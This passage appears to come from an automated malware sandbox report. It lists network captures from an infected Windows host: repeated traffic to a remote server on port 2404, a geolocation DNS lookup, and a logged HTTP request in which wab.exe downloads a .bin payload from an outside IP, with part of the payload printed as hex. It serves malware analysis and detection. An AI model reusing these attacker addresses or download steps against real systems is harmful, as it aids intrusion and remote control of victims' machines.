                                                Apr 22, 2024 13:34:01.684529066 CEST240449737209.90.234.20192.168.2.4
                                                Apr 22, 2024 13:34:01.684560061 CEST497372404192.168.2.4209.90.234.20
                                                Apr 22, 2024 13:34:01.686527014 CEST240449737209.90.234.20192.168.2.4
                                                Apr 22, 2024 13:34:01.686566114 CEST240449737209.90.234.20192.168.2.4
                                                Apr 22, 2024 13:34:01.686604023 CEST240449737209.90.234.20192.168.2.4
                                                Apr 22, 2024 13:34:01.686619997 CEST497372404192.168.2.4209.90.234.20
                                                Apr 22, 2024 13:34:01.686642885 CEST240449737209.90.234.20192.168.2.4
                                                Apr 22, 2024 13:34:01.686651945 CEST497372404192.168.2.4209.90.234.20
                                                Apr 22, 2024 13:34:01.686681986 CEST240449737209.90.234.20192.168.2.4
                                                Apr 22, 2024 13:34:01.686722994 CEST240449737209.90.234.20192.168.2.4
                                                Apr 22, 2024 13:34:01.686762094 CEST240449737209.90.234.20192.168.2.4
                                                Apr 22, 2024 13:34:01.686773062 CEST497372404192.168.2.4209.90.234.20
                                                Apr 22, 2024 13:34:01.686801910 CEST240449737209.90.234.20192.168.2.4
                                                Apr 22, 2024 13:34:01.686810017 CEST497372404192.168.2.4209.90.234.20
                                                Apr 22, 2024 13:34:01.686841011 CEST240449737209.90.234.20192.168.2.4
                                                Apr 22, 2024 13:34:01.686878920 CEST240449737209.90.234.20192.168.2.4
                                                Apr 22, 2024 13:34:01.686916113 CEST240449737209.90.234.20192.168.2.4
                                                Apr 22, 2024 13:34:01.686928034 CEST497372404192.168.2.4209.90.234.20
                                                Apr 22, 2024 13:34:01.686955929 CEST240449737209.90.234.20192.168.2.4
                                                Apr 22, 2024 13:34:01.686961889 CEST497372404192.168.2.4209.90.234.20
                                                Apr 22, 2024 13:34:01.686995029 CEST240449737209.90.234.20192.168.2.4
                                                Apr 22, 2024 13:34:01.687737942 CEST497372404192.168.2.4209.90.234.20
                                                Apr 22, 2024 13:34:01.688180923 CEST240449737209.90.234.20192.168.2.4
                                                Apr 22, 2024 13:34:01.688220024 CEST240449737209.90.234.20192.168.2.4
                                                Apr 22, 2024 13:34:01.688258886 CEST240449737209.90.234.20192.168.2.4
                                                Apr 22, 2024 13:34:01.688297033 CEST240449737209.90.234.20192.168.2.4
                                                Apr 22, 2024 13:34:01.688303947 CEST497372404192.168.2.4209.90.234.20
                                                Apr 22, 2024 13:34:01.688337088 CEST240449737209.90.234.20192.168.2.4
                                                Apr 22, 2024 13:34:01.688343048 CEST497372404192.168.2.4209.90.234.20
                                                Apr 22, 2024 13:34:01.688376904 CEST240449737209.90.234.20192.168.2.4
                                                Apr 22, 2024 13:34:01.688416004 CEST240449737209.90.234.20192.168.2.4
                                                Apr 22, 2024 13:34:01.688453913 CEST240449737209.90.234.20192.168.2.4
                                                Apr 22, 2024 13:34:01.688462973 CEST497372404192.168.2.4209.90.234.20
                                                Apr 22, 2024 13:34:01.688496113 CEST240449737209.90.234.20192.168.2.4
                                                Apr 22, 2024 13:34:01.688512087 CEST497372404192.168.2.4209.90.234.20
                                                Apr 22, 2024 13:34:01.688535929 CEST240449737209.90.234.20192.168.2.4
                                                Apr 22, 2024 13:34:01.688575029 CEST240449737209.90.234.20192.168.2.4
                                                Apr 22, 2024 13:34:01.688613892 CEST240449737209.90.234.20192.168.2.4
                                                Apr 22, 2024 13:34:01.688625097 CEST497372404192.168.2.4209.90.234.20
                                                Apr 22, 2024 13:34:01.688652992 CEST240449737209.90.234.20192.168.2.4
                                                Apr 22, 2024 13:34:01.688658953 CEST497372404192.168.2.4209.90.234.20
                                                Apr 22, 2024 13:34:01.691118956 CEST240449737209.90.234.20192.168.2.4
                                                Apr 22, 2024 13:34:01.691174984 CEST240449737209.90.234.20192.168.2.4
                                                Apr 22, 2024 13:34:01.691215038 CEST240449737209.90.234.20192.168.2.4
                                                Apr 22, 2024 13:34:01.691231966 CEST497372404192.168.2.4209.90.234.20
                                                Apr 22, 2024 13:34:01.691266060 CEST240449737209.90.234.20192.168.2.4
                                                Apr 22, 2024 13:34:01.691277027 CEST497372404192.168.2.4209.90.234.20
                                                Apr 22, 2024 13:34:01.691308022 CEST240449737209.90.234.20192.168.2.4
                                                Apr 22, 2024 13:34:01.691349030 CEST240449737209.90.234.20192.168.2.4
                                                Apr 22, 2024 13:34:01.691386938 CEST240449737209.90.234.20192.168.2.4
                                                Apr 22, 2024 13:34:01.691405058 CEST497372404192.168.2.4209.90.234.20
                                                Apr 22, 2024 13:34:01.691426992 CEST240449737209.90.234.20192.168.2.4
                                                Apr 22, 2024 13:34:01.691437006 CEST497372404192.168.2.4209.90.234.20
                                                Apr 22, 2024 13:34:01.691468000 CEST240449737209.90.234.20192.168.2.4
                                                Apr 22, 2024 13:34:01.691505909 CEST240449737209.90.234.20192.168.2.4
                                                Apr 22, 2024 13:34:01.691544056 CEST240449737209.90.234.20192.168.2.4
                                                Apr 22, 2024 13:34:01.691555023 CEST497372404192.168.2.4209.90.234.20
                                                Apr 22, 2024 13:34:01.691582918 CEST240449737209.90.234.20192.168.2.4
                                                Apr 22, 2024 13:34:01.691590071 CEST497372404192.168.2.4209.90.234.20
                                                Apr 22, 2024 13:34:01.691622019 CEST240449737209.90.234.20192.168.2.4
                                                Apr 22, 2024 13:34:01.691728115 CEST497372404192.168.2.4209.90.234.20
                                                Apr 22, 2024 13:34:01.694293022 CEST240449737209.90.234.20192.168.2.4
                                                Apr 22, 2024 13:34:01.694335938 CEST240449737209.90.234.20192.168.2.4
                                                Apr 22, 2024 13:34:01.694375038 CEST240449737209.90.234.20192.168.2.4
                                                Apr 22, 2024 13:34:01.694412947 CEST240449737209.90.234.20192.168.2.4
                                                Apr 22, 2024 13:34:01.694427967 CEST497372404192.168.2.4209.90.234.20
                                                Apr 22, 2024 13:34:01.694453001 CEST240449737209.90.234.20192.168.2.4
                                                Apr 22, 2024 13:34:01.694462061 CEST497372404192.168.2.4209.90.234.20
                                                Apr 22, 2024 13:34:01.694493055 CEST240449737209.90.234.20192.168.2.4
                                                Apr 22, 2024 13:34:01.694530964 CEST240449737209.90.234.20192.168.2.4
                                                Apr 22, 2024 13:34:01.694567919 CEST240449737209.90.234.20192.168.2.4
                                                Apr 22, 2024 13:34:01.694577932 CEST497372404192.168.2.4209.90.234.20
                                                Apr 22, 2024 13:34:01.694607019 CEST240449737209.90.234.20192.168.2.4
                                                Apr 22, 2024 13:34:01.694621086 CEST497372404192.168.2.4209.90.234.20
                                                Apr 22, 2024 13:34:01.694647074 CEST240449737209.90.234.20192.168.2.4
                                                Apr 22, 2024 13:34:01.694684029 CEST240449737209.90.234.20192.168.2.4
                                                Apr 22, 2024 13:34:01.694722891 CEST240449737209.90.234.20192.168.2.4
                                                Apr 22, 2024 13:34:01.694729090 CEST497372404192.168.2.4209.90.234.20
                                                Apr 22, 2024 13:34:01.694763899 CEST240449737209.90.234.20192.168.2.4
                                                Apr 22, 2024 13:34:01.694775105 CEST497372404192.168.2.4209.90.234.20
                                                Apr 22, 2024 13:34:01.697572947 CEST240449737209.90.234.20192.168.2.4
                                                Apr 22, 2024 13:34:01.697617054 CEST240449737209.90.234.20192.168.2.4
                                                Apr 22, 2024 13:34:01.697634935 CEST497372404192.168.2.4209.90.234.20
                                                Apr 22, 2024 13:34:01.697655916 CEST240449737209.90.234.20192.168.2.4
                                                Apr 22, 2024 13:34:01.697695017 CEST240449737209.90.234.20192.168.2.4
                                                Apr 22, 2024 13:34:01.697736025 CEST240449737209.90.234.20192.168.2.4
                                                Apr 22, 2024 13:34:01.697746992 CEST497372404192.168.2.4209.90.234.20
                                                Apr 22, 2024 13:34:01.697776079 CEST240449737209.90.234.20192.168.2.4
                                                Apr 22, 2024 13:34:01.697788000 CEST497372404192.168.2.4209.90.234.20
                                                Apr 22, 2024 13:34:01.697815895 CEST240449737209.90.234.20192.168.2.4
                                                Apr 22, 2024 13:34:01.697854996 CEST240449737209.90.234.20192.168.2.4
                                                Apr 22, 2024 13:34:01.697891951 CEST240449737209.90.234.20192.168.2.4
                                                Apr 22, 2024 13:34:01.697897911 CEST497372404192.168.2.4209.90.234.20
                                                Apr 22, 2024 13:34:01.697930098 CEST240449737209.90.234.20192.168.2.4
                                                Apr 22, 2024 13:34:01.697947025 CEST497372404192.168.2.4209.90.234.20
                                                Apr 22, 2024 13:34:01.697972059 CEST240449737209.90.234.20192.168.2.4
                                                Apr 22, 2024 13:34:01.698010921 CEST240449737209.90.234.20192.168.2.4
                                                Apr 22, 2024 13:34:01.698024988 CEST497372404192.168.2.4209.90.234.20
                                                Apr 22, 2024 13:34:01.698050022 CEST240449737209.90.234.20192.168.2.4
                                                Apr 22, 2024 13:34:01.698110104 CEST497372404192.168.2.4209.90.234.20
                                                Apr 22, 2024 13:34:01.700511932 CEST240449737209.90.234.20192.168.2.4
                                                Apr 22, 2024 13:34:01.700551033 CEST240449737209.90.234.20192.168.2.4
                                                Apr 22, 2024 13:34:01.700587988 CEST240449737209.90.234.20192.168.2.4
                                                Apr 22, 2024 13:34:01.700606108 CEST497372404192.168.2.4209.90.234.20
                                                Apr 22, 2024 13:34:01.700628042 CEST240449737209.90.234.20192.168.2.4
                                                Apr 22, 2024 13:34:01.700665951 CEST240449737209.90.234.20192.168.2.4
                                                Apr 22, 2024 13:34:01.700704098 CEST240449737209.90.234.20192.168.2.4
                                                Apr 22, 2024 13:34:01.700715065 CEST497372404192.168.2.4209.90.234.20
                                                Apr 22, 2024 13:34:01.700748920 CEST240449737209.90.234.20192.168.2.4
                                                Apr 22, 2024 13:34:01.700757027 CEST497372404192.168.2.4209.90.234.20
                                                Apr 22, 2024 13:34:01.700788975 CEST240449737209.90.234.20192.168.2.4
                                                Apr 22, 2024 13:34:01.700828075 CEST240449737209.90.234.20192.168.2.4
                                                Apr 22, 2024 13:34:01.700869083 CEST240449737209.90.234.20192.168.2.4
                                                Apr 22, 2024 13:34:01.700885057 CEST497372404192.168.2.4209.90.234.20
                                                Apr 22, 2024 13:34:01.700906992 CEST240449737209.90.234.20192.168.2.4
                                                Apr 22, 2024 13:34:01.700917006 CEST497372404192.168.2.4209.90.234.20
                                                Apr 22, 2024 13:34:01.700948000 CEST240449737209.90.234.20192.168.2.4
                                                Apr 22, 2024 13:34:01.700987101 CEST240449737209.90.234.20192.168.2.4
                                                Apr 22, 2024 13:34:01.701040030 CEST497372404192.168.2.4209.90.234.20
                                                Apr 22, 2024 13:34:01.705038071 CEST240449737209.90.234.20192.168.2.4
                                                Apr 22, 2024 13:34:01.705116987 CEST240449737209.90.234.20192.168.2.4
                                                Apr 22, 2024 13:34:01.705153942 CEST497372404192.168.2.4209.90.234.20
                                                Apr 22, 2024 13:34:01.705158949 CEST240449737209.90.234.20192.168.2.4
                                                Apr 22, 2024 13:34:01.705208063 CEST497372404192.168.2.4209.90.234.20
                                                Apr 22, 2024 13:34:01.705252886 CEST240449737209.90.234.20192.168.2.4
                                                Apr 22, 2024 13:34:01.705291986 CEST240449737209.90.234.20192.168.2.4
                                                Apr 22, 2024 13:34:01.705331087 CEST240449737209.90.234.20192.168.2.4
                                                Apr 22, 2024 13:34:01.705343008 CEST497372404192.168.2.4209.90.234.20
                                                Apr 22, 2024 13:34:01.705370903 CEST240449737209.90.234.20192.168.2.4
                                                Apr 22, 2024 13:34:01.705410004 CEST240449737209.90.234.20192.168.2.4
                                                Apr 22, 2024 13:34:01.705446959 CEST240449737209.90.234.20192.168.2.4
                                                Apr 22, 2024 13:34:01.705457926 CEST497372404192.168.2.4209.90.234.20
                                                Apr 22, 2024 13:34:01.705487013 CEST240449737209.90.234.20192.168.2.4
                                                Apr 22, 2024 13:34:01.705495119 CEST497372404192.168.2.4209.90.234.20
                                                Apr 22, 2024 13:34:01.705528021 CEST240449737209.90.234.20192.168.2.4
                                                Apr 22, 2024 13:34:01.705568075 CEST240449737209.90.234.20192.168.2.4
                                                Apr 22, 2024 13:34:01.705590010 CEST497372404192.168.2.4209.90.234.20
                                                Apr 22, 2024 13:34:01.705606937 CEST240449737209.90.234.20192.168.2.4
                                                Apr 22, 2024 13:34:01.705696106 CEST497372404192.168.2.4209.90.234.20
                                                Apr 22, 2024 13:34:01.707053900 CEST497372404192.168.2.4209.90.234.20
                                                Apr 22, 2024 13:34:01.708405972 CEST240449737209.90.234.20192.168.2.4
                                                Apr 22, 2024 13:34:01.708446980 CEST240449737209.90.234.20192.168.2.4
                                                Apr 22, 2024 13:34:01.708488941 CEST240449737209.90.234.20192.168.2.4
                                                Apr 22, 2024 13:34:01.708502054 CEST497372404192.168.2.4209.90.234.20
                                                Apr 22, 2024 13:34:01.708543062 CEST240449737209.90.234.20192.168.2.4
                                                Apr 22, 2024 13:34:01.708583117 CEST240449737209.90.234.20192.168.2.4
                                                Apr 22, 2024 13:34:01.708621025 CEST240449737209.90.234.20192.168.2.4
                                                Apr 22, 2024 13:34:01.708632946 CEST497372404192.168.2.4209.90.234.20
                                                Apr 22, 2024 13:34:01.708659887 CEST240449737209.90.234.20192.168.2.4
                                                Apr 22, 2024 13:34:01.708667994 CEST497372404192.168.2.4209.90.234.20
                                                Apr 22, 2024 13:34:01.708703041 CEST240449737209.90.234.20192.168.2.4
                                                Apr 22, 2024 13:34:01.708741903 CEST240449737209.90.234.20192.168.2.4
                                                Apr 22, 2024 13:34:01.708781004 CEST240449737209.90.234.20192.168.2.4
                                                Apr 22, 2024 13:34:01.708820105 CEST240449737209.90.234.20192.168.2.4
                                                Apr 22, 2024 13:34:01.708833933 CEST497372404192.168.2.4209.90.234.20
                                                Apr 22, 2024 13:34:01.708859921 CEST497372404192.168.2.4209.90.234.20
                                                Apr 22, 2024 13:34:01.708862066 CEST240449737209.90.234.20192.168.2.4
                                                Apr 22, 2024 13:34:01.708900928 CEST240449737209.90.234.20192.168.2.4
                                                Apr 22, 2024 13:34:01.708918095 CEST497372404192.168.2.4209.90.234.20
                                                Apr 22, 2024 13:34:01.715085030 CEST497372404192.168.2.4209.90.234.20
                                                Apr 22, 2024 13:34:01.865900040 CEST240449737209.90.234.20192.168.2.4
                                                Apr 22, 2024 13:34:01.865951061 CEST240449737209.90.234.20192.168.2.4
                                                Apr 22, 2024 13:34:01.865992069 CEST240449737209.90.234.20192.168.2.4
                                                Apr 22, 2024 13:34:01.866039991 CEST497372404192.168.2.4209.90.234.20
                                                Apr 22, 2024 13:34:01.866092920 CEST240449737209.90.234.20192.168.2.4
                                                Apr 22, 2024 13:34:01.866132975 CEST240449737209.90.234.20192.168.2.4
                                                Apr 22, 2024 13:34:01.866144896 CEST497372404192.168.2.4209.90.234.20
                                                Apr 22, 2024 13:34:01.866173983 CEST240449737209.90.234.20192.168.2.4
                                                Apr 22, 2024 13:34:01.866211891 CEST240449737209.90.234.20192.168.2.4
                                                Apr 22, 2024 13:34:01.866250038 CEST240449737209.90.234.20192.168.2.4
                                                Apr 22, 2024 13:34:01.866261005 CEST497372404192.168.2.4209.90.234.20
                                                Apr 22, 2024 13:34:01.866298914 CEST497372404192.168.2.4209.90.234.20
                                                Apr 22, 2024 13:34:01.866305113 CEST240449737209.90.234.20192.168.2.4
                                                Apr 22, 2024 13:34:01.866342068 CEST240449737209.90.234.20192.168.2.4
                                                Apr 22, 2024 13:34:01.866379023 CEST240449737209.90.234.20192.168.2.4
                                                Apr 22, 2024 13:34:01.866414070 CEST240449737209.90.234.20192.168.2.4
                                                Apr 22, 2024 13:34:01.866419077 CEST497372404192.168.2.4209.90.234.20
                                                Apr 22, 2024 13:34:01.866458893 CEST497372404192.168.2.4209.90.234.20
                                                Apr 22, 2024 13:34:01.866472006 CEST240449737209.90.234.20192.168.2.4
                                                Apr 22, 2024 13:34:01.866595984 CEST240449737209.90.234.20192.168.2.4
                                                Apr 22, 2024 13:34:01.866631985 CEST240449737209.90.234.20192.168.2.4
                                                Apr 22, 2024 13:34:01.866669893 CEST240449737209.90.234.20192.168.2.4
                                                Apr 22, 2024 13:34:01.866683006 CEST497372404192.168.2.4209.90.234.20
                                                Apr 22, 2024 13:34:01.866707087 CEST240449737209.90.234.20192.168.2.4
                                                Apr 22, 2024 13:34:01.866725922 CEST497372404192.168.2.4209.90.234.20
                                                Apr 22, 2024 13:34:01.906470060 CEST497372404192.168.2.4209.90.234.20
                                                Apr 22, 2024 13:34:04.352278948 CEST497372404192.168.2.4209.90.234.20
                                                Apr 22, 2024 13:34:04.526067972 CEST240449737209.90.234.20192.168.2.4
                                                Apr 22, 2024 13:34:04.526120901 CEST240449737209.90.234.20192.168.2.4
                                                Apr 22, 2024 13:34:04.526206017 CEST497372404192.168.2.4209.90.234.20
                                                Apr 22, 2024 13:34:04.526252031 CEST240449737209.90.234.20192.168.2.4
                                                Apr 22, 2024 13:34:04.699969053 CEST240449737209.90.234.20192.168.2.4
                                                Apr 22, 2024 13:34:04.700012922 CEST240449737209.90.234.20192.168.2.4
                                                Apr 22, 2024 13:34:04.721236944 CEST240449737209.90.234.20192.168.2.4
                                                Apr 22, 2024 13:34:04.723767996 CEST497372404192.168.2.4209.90.234.20
                                                Apr 22, 2024 13:34:05.150099993 CEST240449736209.90.234.20192.168.2.4
                                                Apr 22, 2024 13:34:05.174503088 CEST497362404192.168.2.4209.90.234.20
                                                Apr 22, 2024 13:34:05.397382021 CEST240449736209.90.234.20192.168.2.4
                                                Apr 22, 2024 13:34:36.288985014 CEST240449736209.90.234.20192.168.2.4
                                                Apr 22, 2024 13:34:36.293087959 CEST497362404192.168.2.4209.90.234.20
                                                Apr 22, 2024 13:34:36.512190104 CEST240449736209.90.234.20192.168.2.4
                                                Apr 22, 2024 13:35:06.508249998 CEST240449736209.90.234.20192.168.2.4
                                                Apr 22, 2024 13:35:06.509737015 CEST497362404192.168.2.4209.90.234.20
                                                Apr 22, 2024 13:35:06.729796886 CEST240449736209.90.234.20192.168.2.4
                                                Apr 22, 2024 13:35:36.733228922 CEST240449736209.90.234.20192.168.2.4
                                                Apr 22, 2024 13:35:36.734817028 CEST497362404192.168.2.4209.90.234.20
                                                Apr 22, 2024 13:35:36.952347994 CEST240449736209.90.234.20192.168.2.4
                                                Apr 22, 2024 13:35:43.469578981 CEST4973880192.168.2.4178.237.33.50
                                                Apr 22, 2024 13:35:43.469702005 CEST4973580192.168.2.4172.93.222.219
                                                Apr 22, 2024 13:35:43.639424086 CEST8049735172.93.222.219192.168.2.4
                                                Apr 22, 2024 13:35:43.639513969 CEST4973580192.168.2.4172.93.222.219
                                                Apr 22, 2024 13:35:44.156730890 CEST4973880192.168.2.4178.237.33.50
                                                Apr 22, 2024 13:35:45.359863043 CEST4973880192.168.2.4178.237.33.50
                                                Apr 22, 2024 13:35:47.469206095 CEST4973880192.168.2.4178.237.33.50
                                                Apr 22, 2024 13:35:51.672357082 CEST4973880192.168.2.4178.237.33.50
                                                Apr 22, 2024 13:35:59.969274044 CEST4973880192.168.2.4178.237.33.50
                                                Apr 22, 2024 13:36:07.029634953 CEST240449736209.90.234.20192.168.2.4
                                                Apr 22, 2024 13:36:07.033299923 CEST497362404192.168.2.4209.90.234.20
                                                Apr 22, 2024 13:36:07.247915983 CEST240449736209.90.234.20192.168.2.4
                                                Apr 22, 2024 13:36:16.359894991 CEST4973880192.168.2.4178.237.33.50
                                                Apr 22, 2024 13:36:37.277825117 CEST240449736209.90.234.20192.168.2.4
                                                Apr 22, 2024 13:36:37.279217958 CEST497362404192.168.2.4209.90.234.20
                                                Apr 22, 2024 13:36:37.512371063 CEST240449736209.90.234.20192.168.2.4
                                                Apr 22, 2024 13:37:07.602796078 CEST240449736209.90.234.20192.168.2.4
                                                Apr 22, 2024 13:37:07.607522964 CEST497362404192.168.2.4209.90.234.20
                                                Apr 22, 2024 13:37:07.827436924 CEST240449736209.90.234.20192.168.2.4
                                                TimestampSource PortDest PortSource IPDest IP
                                                Apr 22, 2024 13:33:59.703661919 CEST6545053192.168.2.41.1.1.1
                                                Apr 22, 2024 13:33:59.809875965 CEST53654501.1.1.1192.168.2.4
                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                Apr 22, 2024 13:33:59.703661919 CEST192.168.2.41.1.1.10x3cbbStandard query (0)geoplugin.netA (IP address)IN (0x0001)false
                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                Apr 22, 2024 13:33:59.809875965 CEST1.1.1.1192.168.2.40x3cbbNo error (0)geoplugin.net178.237.33.50A (IP address)IN (0x0001)false
                                                • 172.93.222.219
                                                • geoplugin.net
                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                0192.168.2.449735172.93.222.219804048C:\Program Files (x86)\Windows Mail\wab.exe
                                                TimestampBytes transferredDirectionData
                                                Apr 22, 2024 13:33:53.664129972 CEST178OUTGET /cfEKrtHdTjiVs63.bin HTTP/1.1
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                Host: 172.93.222.219
                                                Cache-Control: no-cache
                                                Apr 22, 2024 13:33:53.838898897 CEST1289INHTTP/1.1 200 OK
                                                Content-Type: application/octet-stream
                                                Last-Modified: Mon, 22 Apr 2024 06:12:07 GMT
                                                Accept-Ranges: bytes
                                                ETag: "d28a17c94da1:0"
                                                Server: Microsoft-IIS/10.0
                                                Date: Mon, 22 Apr 2024 11:33:53 GMT
                                                Content-Length: 494656
                                                Data Raw: 78 95 e7 6d d4 14 f5 fb 10 20 32 91 c6 e3 91 64 62 67 8f 0b dd c8 f3 64 7e f0 74 31 01 9d fb 7b e5 a5 45 15 67 4a fb fd f3 da b7 02 5e 3f 13 04 81 85 bf 8a 75 2f 53 03 e5 32 55 7c 1b 70 75 a9 5d f5 23 04 28 bf 96 74 e8 9d 1c 37 c5 4b e0 57 ad 6f 4f a7 a5 fc ae b1 7c 6e 26 bc 74 de b0 98 94 83 ad 24 3e 13 f8 76 17 db 6b 07 cd 1a 18 b1 65 5e 7a aa e1 6f c6 b8 33 97 27 d0 65 e9 93 58 9b dc 7c 83 1c b2 fb 4b bb 92 75 1d 46 1e 36 95 50 41 fe ea ec c7 f0 a7 36 1c c2 29 5f 8e 40 07 48 21 40 c2 58 90 dd 84 28 3a c1 a6 7c 06 70 15 45 d1 e6 4d 0c 9b 6a a6 24 40 e2 6e 02 86 f5 7f f8 b7 cc 15 59 35 56 ad e6 fd 1a 0f 56 e9 a0 75 1f 85 36 e2 c2 d5 b0 d6 36 05 38 61 88 7e e5 87 e1 dd 70 c3 f0 5e e3 c9 d8 f4 a3 10 a8 ac 06 fd 9d 0b d2 e6 b0 97 d3 b5 87 20 c9 b2 ae dd 73 ba 8b 94 b4 6d c8 f0 cb 9c 10 d4 5b 00 81 f6 fc ac e4 07 8c ad 47 f9 d8 e3 f5 e3 1a bf 0b 6f 73 3f 88 9f 8f b3 1b 6f 0d 78 7a 1e 58 0f 9a 3d db 7a 29 95 17 10 91 98 84 eb 29 c1 41 3a 2d 4b 48 5d 86 d4 cb f4 67 d8 86 3f 38 b6 09 b5 c9 08 d9 71 cf 41 4d 94 b0 3b de 8d 4a e8 ef 01 b8 0d 18 04 10 cd c9 90 f7 29 84 5d 7e 00 c9 01 ff c1 b0 32 9a a2 d6 77 a7 79 a2 49 66 ec 81 2f 1f 71 f1 f2 f9 4e 5d da 78 d4 6d c9 5d 17 b7 e7 cb 85 39 e3 c8 19 9f c6 9d 39 4c 3b 9e 75 31 94 c0 a8 e9 79 64 75 54 42 f6 c0 64 ea 3d 1c 4b b0 25 26 29 5f 4d 3e 3e f9 91 e7 d0 c2 a2 91 bc 5d c4 85 df 6c 10 0d 5b d6 4a fb fb 80 c7 f7 af f6 af 08 86 f1 07 ca 76 1e 44 c1 5d 54 4d 43 91 6c 8e fb 71 d7 57 81 f5 e1 31 f6 f1 e7 db e5 c4 7b 41 58 20 27 dd 39 a1 ef 89 f1 04 f3 83 37 d7 c3 ad 5b a5 85 e3 d8 9c 2a 25 e6 b0 2b f7 9a b7 81 d4 59 e0 c2 71 c1 41 c3 dc 90 a1 8e fd 83 c0 db 90 8a af 73 31 6c 14 09 02 0f 4c 77 0d 59 41 b9 fa 11 4e a3 c3 4d 0d 90 e4 4e 7c 57 58 37 8e 1e d4 d3 10 1d 4a 82 23 45 2d 49 e8 2b ac 0e ac d1 37 f1 67 a5 bf c6 77 ca db f9 40 a4 47 06 6c f0 cd f6 1d 67 84 b1 b9 e6 b9 d0 20 02 4c 66 9c c9 8f ce 36 81 55 23 ee c6 c2 3b 03 59 2e 14 74 01 e6 25 cc 12 dd 4c 16 d2 8a 5b 9c d7 0d ed fb 72 01 8a b0 46 c7 21 d1 c6 7d 40 21 27 17 1d ab 5d 81 6b d4 78 68 c5 3c 1c 2d 69 df b1 09 b8 78 f2 6f d7 85 51 b5 fc b9 bc 02 a1 d1 2b 63 bb 0a ca 00 c6 2a 15 3e 3e f2 90 a8 fa 42 03 63 ce cf 56 35 83 17 7f 51 3d 38 01 22 0d 90 52 cd 33 05 91 0a 74 60 4f d1 3d 01 64 ea d4 3b 44 a8 cf 5c eb d6 2b 95 93 1c 39 85 c6 26 22 51 f6 e2 9b 1d 30 4a 8a 36 46 1e 2e 34 83 a9 74 b9 0f f6 75 05 d2 d7 ae 88 29 ce 73 79 3e 4e 95 4e d9 ff 64 d9 83 60 f1 3d 72 8f b6 1f 2d 5f b8 b6 76 48 19 22 2c 35 83 bc 33 22 8a 20 bf ec eb 04 32 d4 da c6 39 20 ae 03 1c fc fd a0 0f ce 26 c2 45 3f d5 5e 8c 7a 74 7c f0 ee 96 44 39 c4 e9 7c 14 56 7b ae e9 0f 95 5e 52 1a 8b 5b b7 7c 58 9d 27 2c e9 d9 69 4e 04 d7 fa ac c4 fb 93 71 76 9f 27 66 9e e8 97 64 e9 4a b8 0c 39 9d 2a 07 6f f3 27 cb 8e ea 92 46 bd f5 35 77 78 7d be db d3 02 39 d8 b1 a4 8b 4d 50 1b 41 08 11 41 c7 92 46 45 32 bf b9 35 27 0e 8d 2b 8c 5c 99 78 13 50 98 15 4e 26 d1 e4 ad 09 be 67 1b 37 ab 43 0a 3b 8b ad 80 1f 91 04 06 84 aa 7d 60 54 fd a8 f9 eb 99 6d 97 6a 69 b8 51 76 20 ba d0 9d 5d 9a 45 3b 95 a6 d3 56 d6 94 a0 ff a9 47 04 39 78 66 d2 4c 29 68 7d de ea c6 2c cf 20 07 5d cd 58 de c4 22 7c 85 20 47 c1 ab e3 1b 02 fc a8 76 b6 27 9a 29 5f 1c d5 4c
                                                Data Ascii: xm 2dbgd~t1{EgJ^?u/S2U|pu]#(t7KWoO|n&t$>vke^zo3'eX|KuF6PA6)_@H!@X(:|pEMj$@nY5VVu668a~p^ sm[Gos?oxzX=z))A:-KH]g?8qAM;J)]~2wyIf/qN]xm]99L;u1yduTBd=K%&)_M>>]l[JvD]TMClqW1{AX '97[*%+YqAs1lLwYANMN|WX7J#E-I+7gw@Glg Lf6U#;Y.t%L[rF!}@!']kxh<-ixoQ+c*>>BcV5Q=8"R3t`O=d;D\+9&"Q0J6F.4tu)sy>NNd`=r-_vH",53" 29 &E?^zt|D9|V{^R[|X',iNqv'fdJ9*o'F5wx}9MPAAFE25'+\xPN&g7C;}`TmjiQv ]E;VG9xfL)h}, ]X"| Gv')_L
                                                Apr 22, 2024 13:33:53.838922024 CEST1289INData Raw: 7d 0b 13 d3 84 6e 41 a0 5f b2 e3 46 3e 88 79 07 a7 56 08 66 f4 1d ce 07 f3 77 11 48 1f 1a 02 bc a0 30 c4 83 08 04 05 1c f2 f1 1b 08 ea ed cf 44 01 8c a2 3f 33 3b c0 a8 de fd 6f db fb 0b 94 4d 1d fe 2c f5 ae f7 da 94 87 52 0d 17 78 6f a4 d7 e4 4e
                                                Data Ascii: }nA_F>yVfwH0D?3;oM,RxoN-P:&xS$~7,uI<.%xAPB_p\<g09NWO ])/`:>E>m<a4M[T?-EhdmF`3Yv
                                                Apr 22, 2024 13:33:53.839077950 CEST1289INData Raw: 7f 72 f5 57 4a 76 3c 95 f9 42 6b 29 4f 8a 56 dd 89 22 7c 51 66 fb 69 6f 72 d3 52 25 5d 37 92 0a 2d a3 27 86 bc 44 64 42 b6 09 87 86 f1 f9 ea d3 d9 d0 93 c4 6d b7 c5 26 fb 95 4f 32 be 5a 30 a2 2f 0c 45 1e 46 5f 02 ec 74 51 4f c4 76 05 8b 54 62 44
                                                Data Ascii: rWJv<Bk)OV"|QfiorR%]7-'DdBm&O2Z0/EF_tQOvTbD,Y$E6qOY{Nlf4q:\!khH+6wu'Yt%+wNGwLB(|'n]c@yxj^>n~m|g*D+;U2b
                                                Apr 22, 2024 13:33:53.839135885 CEST1289INData Raw: cd c9 31 c3 42 c1 5c b4 e1 c2 02 fa 27 f8 75 9a de f4 27 58 4c 6a 63 ce a5 7d 3a 5b f5 b4 f2 72 d3 8c b1 3f d4 c5 1e a0 f8 48 64 f6 d3 52 a4 cd e6 eb c9 16 f6 a4 33 b5 75 30 c5 4b 67 01 e2 4a 55 5c c1 1a dc e9 ae 19 34 c0 7c 77 ce 93 d9 4d 3e 44
                                                Data Ascii: 1B\'u'XLjc}:[r?HdR3u0KgJU\4|wM>D88lPxx<:P()QM2):bsNrg'V.RX*%~|\puHl<"(0=Lw!G0B1r(rM4Z^No WZ
                                                Apr 22, 2024 13:33:53.839277983 CEST1289INData Raw: 5a 35 a4 fc 13 e2 5c b6 ee 93 25 0f ff c3 e7 a9 0d d0 4e 71 3d 14 e6 36 78 28 9c bf 47 48 2c fe 49 40 2f fe d6 51 5a 4a cd f9 cb 6a a5 22 7f 13 67 63 0d 88 7b 60 c8 66 26 ae 18 12 af b3 54 a0 70 7e ad ee 9d 1c 67 d2 b7 f1 57 15 36 16 23 65 88 89
